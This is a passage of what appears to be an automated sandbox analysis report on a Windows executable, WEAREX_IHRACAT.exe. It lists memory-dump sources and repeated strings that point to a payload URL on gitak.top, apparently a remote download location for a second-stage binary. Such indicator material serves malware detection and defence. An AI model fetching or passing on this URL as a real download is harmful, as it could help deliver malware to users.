00000002.00000003.3249592249.00000000028F8000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.3779599749.00000000028F8000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.3143833257.00000000028F8000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.5565166961.00000000028F8000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.3671604418.00000000028F8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gitak.top/dmAaHCQMI79.bin/M~
      Source: WEAREX_IHRACAT.exe, 00000002.00000003.6093234586.00000000028F8000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.4515139164.00000000028F8000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.4305270974.00000000028F8000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.4620491652.00000000028F8000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.5778014875.00000000028F8000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.4725765947.00000000028F8000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.2828520597.00000000028F8000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.5988062623.00000000028F8000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.4199758222.00000000028F8000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.6304603220.00000000028F8000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.3779599749.00000000028F8000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.5565166961.00000000028F8000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.6198947773.00000000028F8000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.3671604418.00000000028F8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gitak.top/dmAaHCQMI79.bin/W~
      Source: WEAREX_IHRACAT.exe, 00000002.00000003.4515139164.00000000028F8000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.4305270974.00000000028F8000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.4620491652.00000000028F8000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.4094289646.00000000028F8000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.3460424593.00000000028F8000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.3354740699.00000000028F8000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.6515406962.00000000028F8000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.6410278380.00000000028F8000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.3566476517.00000000028F8000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.4725765947.00000000028F8000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.4199758222.00000000028F8000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.3779599749.00000000028F8000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.3671604418.00000000028F8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gitak.top/dmAaHCQMI79.bin/Y~
      Source: WEAREX_IHRACAT.exe, 00000002.00000003.4515139164.00000000028F8000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.4305270974.00000000028F8000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.4620491652.00000000028F8000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.3460424593.00000000028F8000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.3354740699.00000000028F8000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.3566476517.00000000028F8000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.3249592249.00000000028F8000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.3143833257.00000000028F8000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.3671604418.00000000028F8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gitak.top/dmAaHCQMI79.bin/c~
      Source: WEAREX_IHRACAT.exe, 00000002.00000003.2512754360.00000000028B2000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.2617874647.00000000028B2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gitak.top/dmAaHCQMI79.bin/dmAaHCQMI79.bin
      Source: WEAREX_IHRACAT.exe, 00000002.00000003.3038762568.00000000028B2000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.3354740699.00000000028B2000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.3143833257.00000000028B2000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.3249244982.00000000028B2000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.2933587214.00000000028B2000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.2828251598.00000000028B2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gitak.top/dmAaHCQMI79.bin/dmAaHCQMI79.bin6
      Source: WEAREX_IHRACAT.exe, 00000002.00000003.4620128373.00000000028AA000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.4725430608.00000000028AA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gitak.top/dmAaHCQMI79.bin/dmAaHCQMI79.binD
      Source: WEAREX_IHRACAT.exe, 00000002.00000003.4305061153.00000000028AA000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.4199758222.00000000028AA000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.3671604418.00000000028B2000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.4094289646.00000000028B0000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.3779309512.00000000028B2000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.6515406962.00000000028AA000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.6410278380.00000000028AA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gitak.top/dmAaHCQMI79.bin/dmAaHCQMI79.binR
      Source: WEAREX_IHRACAT.exe, 00000002.00000003.3460424593.00000000028B0000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.3565994921.00000000028B0000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.3354740699.00000000028B2000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.4725430608.00000000028AA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gitak.top/dmAaHCQMI79.bin/dmAaHCQMI79.binX
      Source: WEAREX_IHRACAT.exe, 00000002.00000003.2723003932.00000000028B2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gitak.top/dmAaHCQMI79.bin/dmAaHCQMI79.binl
      Source: WEAREX_IHRACAT.exe, 00000002.00000003.6093234586.00000000028AA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gitak.top/dmAaHCQMI79.bin/dmAaHCQMI79.binz
      Source: WEAREX_IHRACAT.exe, 00000002.00000003.6620540975.00000000028F8000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.6515406962.00000000028F8000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.6410278380.00000000028F8000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000002.6653610966.00000000028F8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gitak.top/dmAaHCQMI79.bin/e~
      Source: WEAREX_IHRACAT.exe, 00000002.00000003.2302693054.00000000028F8000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.4094289646.00000000028F8000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.3354740699.00000000028F8000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.2933587214.00000000028F8000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.3249592249.00000000028F8000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.3779599749.00000000028F8000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.2512754360.00000000028F8000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.2407870559.00000000028F8000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.3143833257.00000000028F8000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.2618082877.00000000028F8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gitak.top/dmAaHCQMI79.bin/o~
      Source: WEAREX_IHRACAT.exe, 00000002.00000003.4620128373.00000000028AA000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.4305061153.00000000028AA000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.6198947773.00000000028AA000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.3565994921.00000000028B0000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.5565166961.00000000028AA000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.4199758222.00000000028AA000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.3671604418.00000000028B2000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.5988062623.00000000028AA000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.5777651201.00000000028AA000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000002.6653532538.00000000028AA000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.4514950009.00000000028AA000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.4094289646.00000000028B0000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.5672578365.00000000028AA000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.3779309512.00000000028B2000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.6620540975.00000000028AA000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.6515406962.00000000028AA000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.6410278380.00000000028AA000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.6304603220.00000000028AA000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.6093234586.00000000028AA000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.4725430608.00000000028AA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gitak.top/dmAaHCQMI79.bin0
      Source: WEAREX_IHRACAT.exe, 00000002.00000003.5988266502.000000000287A000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.2197590543.000000000287D000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.6093636332.000000000287A000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.2302765402.000000000287D000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.6199353892.000000000287A000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.6620738937.000000000287A000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.6305027978.000000000287A000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.6410480994.000000000287A000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000002.6653418336.000000000287A000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.6515602395.000000000287A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gitak.top/dmAaHCQMI79.bin5
      Source: WEAREX_IHRACAT.exe, 00000002.00000003.4305061153.00000000028AA000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.6198947773.00000000028AA000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.3565994921.00000000028B0000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.5565166961.00000000028AA000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.2723003932.00000000028B2000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.4199758222.00000000028AA000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.2302487470.00000000028B2000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.2197210122.00000000028B2000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.2512754360.00000000028B2000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.2407654898.00000000028B2000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.3671604418.00000000028B2000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.5988062623.00000000028AA000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.5777651201.00000000028AA000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.4514950009.00000000028AA000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.2617874647.00000000028B2000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.4094289646.00000000028B0000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.5672578365.00000000028AA000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.3779309512.00000000028B2000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.6515406962.00000000028AA000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.6410278380.00000000028AA000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.6304603220.00000000028AA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gitak.top/dmAaHCQMI79.bin6
      Source: WEAREX_IHRACAT.exe, 00000002.00000003.2302693054.00000000028F8000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.2407870559.00000000028F8000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.2197210122.00000000028F8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gitak.top/dmAaHCQMI79.bin7~
      Source: WEAREX_IHRACAT.exe, 00000002.00000003.2302693054.00000000028F8000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.3460424593.00000000028F8000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.3354740699.00000000028F8000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.2933587214.00000000028F8000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.3566476517.00000000028F8000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.3038962760.00000000028F8000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.2828520597.00000000028F8000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.2723257171.00000000028F8000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.1986769788.00000000028F8000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.3249592249.00000000028F8000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.2091965259.00000000028F8000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.2512754360.00000000028F8000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.2407870559.00000000028F8000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.2197210122.00000000028F8000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.3143833257.00000000028F8000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.2618082877.00000000028F8000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.3671604418.00000000028F8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gitak.top/dmAaHCQMI79.bin9~
      Source: WEAREX_IHRACAT.exe, 00000002.00000003.6198947773.00000000028AA000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.5565166961.00000000028AA000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.5988062623.00000000028AA000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.5777651201.00000000028AA000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000002.6653532538.00000000028AA000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.5672578365.00000000028AA000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.6620540975.00000000028AA000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.6515406962.00000000028AA000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.6410278380.00000000028AA000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.6304603220.00000000028AA000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.6093234586.00000000028AA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gitak.top/dmAaHCQMI79.binAuthority
      Source: WEAREX_IHRACAT.exe, 00000002.00000003.2302693054.00000000028F8000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.3566476517.00000000028F8000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.3038962760.00000000028F8000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.3779599749.00000000028F8000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.3671604418.00000000028F8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gitak.top/dmAaHCQMI79.binA~
      Source: WEAREX_IHRACAT.exe, 00000002.00000003.4305061153.00000000028AA000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.5565166961.00000000028AA000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.2091965259.00000000028B2000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.4199758222.00000000028AA000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.2302487470.00000000028B2000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.2197210122.00000000028B2000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.2512754360.00000000028B2000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.2407654898.00000000028B2000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.4514950009.00000000028AA000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.2617874647.00000000028B2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gitak.top/dmAaHCQMI79.binD
      Source: WEAREX_IHRACAT.exe, 00000002.00000003.4620128373.00000000028AA000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.4305061153.00000000028AA000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.6198947773.00000000028AA000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.5565166961.00000000028AA000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.4199758222.00000000028AA000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.5988062623.00000000028AA000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.5777651201.00000000028AA000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000002.6653532538.00000000028AA000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.4514950009.00000000028AA000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.4094289646.00000000028B0000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.5672578365.00000000028AA000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.3779309512.00000000028B2000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.6620540975.00000000028AA000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.6515406962.00000000028AA000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.6410278380.00000000028AA000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.6304603220.00000000028AA000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.6093234586.00000000028AA000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.4725430608.00000000028AA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gitak.top/dmAaHCQMI79.binK
      Source: WEAREX_IHRACAT.exe, 00000002.00000003.6093234586.00000000028F8000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.4305270974.00000000028F8000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.4094289646.00000000028F8000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.6620540975.00000000028F8000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.5778014875.00000000028F8000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.6515406962.00000000028F8000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.6410278380.00000000028F8000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.5988062623.00000000028F8000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.4199758222.00000000028F8000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.5672784128.00000000028F8000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.6304603220.00000000028F8000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.5565166961.00000000028F8000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.6198947773.00000000028F8000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000002.6653610966.00000000028F8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gitak.top/dmAaHCQMI79.binK~v
      Source: WEAREX_IHRACAT.exe, 00000002.00000003.4620128373.00000000028AA000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.4305061153.00000000028AA000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.3460424593.00000000028B0000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.6198947773.00000000028AA000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.3565994921.00000000028B0000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.5565166961.00000000028AA000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.2723003932.00000000028B2000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.2091965259.00000000028B2000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.4199758222.00000000028AA000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.2302487470.00000000028B2000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.2197210122.00000000028B2000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.3038762568.00000000028B2000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.3354740699.00000000028B2000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.2512754360.00000000028B2000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.2407654898.00000000028B2000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.3671604418.00000000028B2000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.5988062623.00000000028AA000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.5777651201.00000000028AA000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000002.6653532538.00000000028AA000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.3143833257.00000000028B2000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.3249244982.00000000028B2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gitak.top/dmAaHCQMI79.binMicrosoft
      Source: WEAREX_IHRACAT.exe, 00000002.00000003.1986769788.00000000028F8000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.2091965259.00000000028F8000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.2512754360.00000000028F8000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.2197210122.00000000028F8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gitak.top/dmAaHCQMI79.binM~
      Source: WEAREX_IHRACAT.exe, 00000002.00000002.6653324742.0000000002838000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gitak.top/dmAaHCQMI79.binNJ
